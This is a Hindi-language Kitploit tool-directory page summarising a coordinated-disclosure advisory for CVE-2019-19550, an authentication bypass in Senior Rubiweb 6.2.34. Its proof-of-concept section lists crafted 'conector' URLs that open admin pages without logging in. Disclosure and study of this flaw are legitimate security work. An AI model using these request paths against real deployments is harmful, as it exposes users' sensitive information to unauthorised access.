Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-19550 — Senior Rubiweb 6.2.34 में प्रमाणीकरण बायपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो विशेष रूप से तैयार किए गए URL के माध्यम से एडमिन को संवेदनशील जानकारी तक पहुंच प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/redteambrasil/cve-2019-19550
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणगलत कॉन्फ़िगरेशन
GitHubredteambrasil/cve-2019-19550

CVE-2019-19550

Senior Rubiweb 6.2.34 में प्रमाणीकरण बायपास के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो विशेष रूप से तैयार किए गए URL के माध्यम से एडमिन को संवेदनशील जानकारी तक पहुंच प्रदान करता है।

रिपॉजिटरी देखें
41 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-19550


[विवरण]

Senior Rubiweb 6.2.34.28 और 6.2.34.37 में रिमोट प्रमाणीकरण बायपास (Remote Authentication Bypass) कमजोर संस्करणों का उपयोग करने वाले प्रभावित उपयोगकर्ताओं की संवेदनशील जानकारी तक व्यवस्थापक (admin) पहुँच की अनुमति देता है। हमलावर को केवल सही URL प्रदान करने की आवश्यकता होती है।


[महत्वपूर्ण तिथियाँ]

  • विक्रेता को घोषणा: 2019-12-02
  • सार्वजनिक प्रकटीकरण तिथि: 2020-01-30

[भेद्यता प्रकार]

गलत अभिगम नियंत्रण


[उत्पाद का विक्रेता]

Senior


[प्रभावित उत्पाद कोड बेस]

  • Rubiweb - 6.2.34.37
  • Rubiweb - 6.2.34.28
  • अन्य संस्करण भी प्रभावित हो सकते हैं, विशेष रूप से समान परिवार में (अभी परीक्षण नहीं किया गया है)

[प्रभावित घटक]

Rubiweb


[हमले का प्रकार]

दूरस्थ


[प्रभाव सूचना प्रकटीकरण]

सत्य


[हमले के वेक्टर]

संवेदनशील जानकारी तक पहुँच बिना किसी विशेष आवश्यकता के सार्वजनिक रूप से उपलब्ध है (केवल सही URI)


[क्या विक्रेता ने भेद्यता की पुष्टि या स्वीकार किया है?]

सत्य


[PoC - अवधारणा का प्रमाण]

  1. प्रभावित उत्पाद की उपस्थिति और संस्करण की पुष्टि करने के लिए बस प्रमाणित पोर्टल से कनेक्ट करने का प्रयास करें:
    • hXXp://subdomain.customer.tld:8080/rubiweb/
  2. कमजोर पृष्ठ तक पहुँचें (बिना प्रमाणीकरण के व्यवस्थापक):
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
    • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU

[खोजकर्ता]

Mauricio Santos (R&D UnderProtection) और Hesron Hori (R&D UnderProtection) और @redteambrasil


[धन्यवाद]

Senior - विक्रेता की सूचना सुरक्षा टीम जिसने समन्वित प्रकटीकरण में सहयोग किया


[संदर्भ]

  • https://www.underprotection.com.br
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm
  • https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm#central-de-configuracao/CfgWebApplicationsForm.htm%23CfgWebApplicationsForm_edtUserName
टूल डाउनलोड करें